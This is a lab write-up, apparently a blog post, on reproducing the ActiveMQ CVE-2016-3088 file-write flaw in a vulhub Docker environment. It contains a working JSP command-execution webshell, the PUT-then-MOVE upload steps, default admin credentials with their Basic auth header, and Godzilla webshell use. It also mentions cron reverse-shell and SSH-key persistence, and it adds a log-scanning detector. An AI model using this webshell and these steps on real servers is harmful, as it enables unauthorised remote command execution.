[vulhub vulnerability reproduction] CVE-2016-3088 ActiveMQ arbitrary file write vulnerability

1. Vulnerability Details

Affected version: Apache ActiveMQ 5.x~5.14.0

Vulnerability principle: ActiveMQ's fileserver application, which is used to store files, allows files to be written but not executed. A written file can be moved with the HTTP MOVE method into another directory that does execute files, and then accessed there.

In versions 5.12.x~5.13.x, ActiveMQ disables the fileserver application by default (it can still be enabled in conf/jetty.xml); after version 5.14.0, the fileserver application is removed entirely.

2. Reproduction process

  1. Build the Docker environment

docker-compose up -d

Access the console on port 8161

Log in with the default credentials admin/admin

  2. Write the webshell file

A successful file upload requires the following prerequisites:

  • The absolute path of the upload directory is known

  • The website has a file upload function

  • File types are not restricted

  • Uploaded files can be executed

The absolute path of the ActiveMQ installation can be obtained from the http://your-ip:8161/admin/test/systemProperties.jsp page

I found a jsp Trojan horse on the Internet

<%@ page import="java.io.*" %>
<%
    try {
        String cmd = request.getParameter("cmd");
        Process child = Runtime.getRuntime().exec(cmd);
        InputStream in = child.getInputStream();
        int c;
        while ((c = in.read()) != -1) {
            out.print((char) c);
        }
        in.close();
        try {
            child.waitFor();
        } catch (InterruptedException e) {
            e.printStackTrace();
        }
    } catch (IOException e) {
        System.err.println(e);
    }
%>

Capture the request with Burp Suite (bp) and send the upload; the response shows that the upload succeeded

Visiting http://192.168.239.128:8161/fileserver/1.jsp shows that the file has been written but is not executed

  3. MOVE the file to an executable directory

Use MOVE to move the Trojan file to api or admin. I moved it to the admin directory.

ActiveMQ's web console is divided into three applications, admin, api and fileserver, where admin is the administrator page, api is the interface, and fileserver is the application for storing files.

  4. Access the file

http://192.168.239.128:8161/admin/1.jsp?cmd=ls
http://192.168.239.128:8161/admin/1.jsp?cmd=whoami

  5. (Alternative) Use Godzilla to generate a webshell and connect

Use Godzilla to generate a jsp webshell file and PUT it to the fileserver interface; a 204 is returned, so this upload also succeeds

MOVE the file

Connect with Godzilla

URL=http://192.168.239.128:8161/admin/1.jsp

Pay attention to the choice of payload and encryptor

Because the operations above require logging in as the admin user, we need to add an authentication header in the request configuration

Authorization: Basic YWRtaW46YWRtaW4=

Test the connection; it connects successfully
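The PUT-then-MOVE sequence used in the steps above, seen from the defender's side: this is an added example (not part of the original post) that scans Jetty-style access log lines for files written to /fileserver/ and then MOVEd by the same client, and for any .jsp written there at all. The log lines are constructed, and the NCSA-style format and the absence of the Destination header in the access log are assumptions about how ActiveMQ's embedded Jetty is configured to log.

```python
import re
from collections import defaultdict

# Constructed sample lines in NCSA format, as an embedded-Jetty request log
# might record the walkthrough above (assumed format; not real log data).
SAMPLE_LOG = """\
10.0.0.5 - - [01/Mar/2023:10:00:01 +0000] "GET /admin/ HTTP/1.1" 200 5120
10.0.0.7 - - [01/Mar/2023:10:00:12 +0000] "PUT /fileserver/1.jsp HTTP/1.1" 204 0
10.0.0.7 - - [01/Mar/2023:10:00:15 +0000] "MOVE /fileserver/1.jsp HTTP/1.1" 204 0
10.0.0.7 - - [01/Mar/2023:10:00:20 +0000] "GET /admin/1.jsp?cmd=whoami HTTP/1.1" 200 18
10.0.0.9 - - [01/Mar/2023:10:01:00 +0000] "PUT /fileserver/notes.txt HTTP/1.1" 204 0
"""

LINE_RE = re.compile(
    r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\S+)')


def parse(line):
    """Split one NCSA-style request log line into its fields, or None if malformed."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ip, ts, method, path, status, size = m.groups()
    return {"ip": ip, "ts": ts, "method": method, "path": path, "status": int(status)}


def find_fileserver_abuse(log_text):
    """Return (client, finding, path) tuples: a .jsp written into /fileserver/,
    and a PUT followed by a MOVE of the same path from the same client, which is
    the pattern that lands a written file in an executable web application."""
    findings = []
    written = defaultdict(set)  # client ip -> paths it has PUT into /fileserver/
    for raw in log_text.splitlines():
        r = parse(raw)
        if not r or not r["path"].startswith("/fileserver/"):
            continue
        name = r["path"].split("?", 1)[0]
        if r["method"] == "PUT":
            written[r["ip"]].add(name)
            if name.lower().endswith(".jsp"):
                findings.append((r["ip"], "jsp-written-to-fileserver", name))
        elif r["method"] == "MOVE" and name in written[r["ip"]]:
            findings.append((r["ip"], "put-then-move", name))
    return findings


if __name__ == "__main__":
    for client, finding, path in find_fileserver_abuse(SAMPLE_LOG):
        print(f"{client}: {finding} {path}")
```

On a patched install (5.14.0 and later) any request to /fileserver/ is itself anomalous, so the same scan can simply flag every hit there.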

3. Summary

The MOVE method is quite dangerous; use it with caution!

There are other approaches to exploiting an arbitrary file write:

  • Write a webshell (modifying jetty.xml only removes the precondition that admin and api require login before the webshell can be written)
  • Write a cron file (scheduled reverse shell)
  • Write an SSH key

Here is an article by an expert that explains all three of the above methods against this vulnerability in detail:

https://www.freebuf.com/vuls/274088.html

As a beginner, I still need to keep studying...


Origin blog.csdn.net/m0_51683653/article/details/129240528